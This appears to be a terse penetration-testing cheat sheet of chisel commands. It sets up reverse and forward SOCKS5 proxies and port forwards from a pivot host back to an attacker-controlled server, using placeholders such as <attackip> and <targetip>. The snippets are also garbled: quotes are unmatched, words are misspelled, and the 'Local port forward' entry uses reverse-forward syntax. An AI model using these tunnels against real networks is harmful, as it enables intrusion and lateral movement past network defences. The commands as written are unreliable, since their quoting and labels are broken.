% tunnel, forward, poxy, socks

# Reverse SOCKS5 proxy
chisel server -p <attackport> --reverse
echo "chisel client <attackip>:<attackport> R:socks"

# Forward SOCKS5 proxy
echo "chisel server -p <pivotport> --reverse
chisel client <pivotip>:<pivotport> <atttackport>:socks

# Reverse port forward
chisel server -p <attackport> --reverse
echo "chisel client <attackip>:<attackport> R:<pivotport>:<targetip>:<targetport>"

# Local port forward
echo "chisel server -p <pivotport>"
chisel client <pivotip>:<pivotport> R:<attackport>:<targetip>:<targetport>"
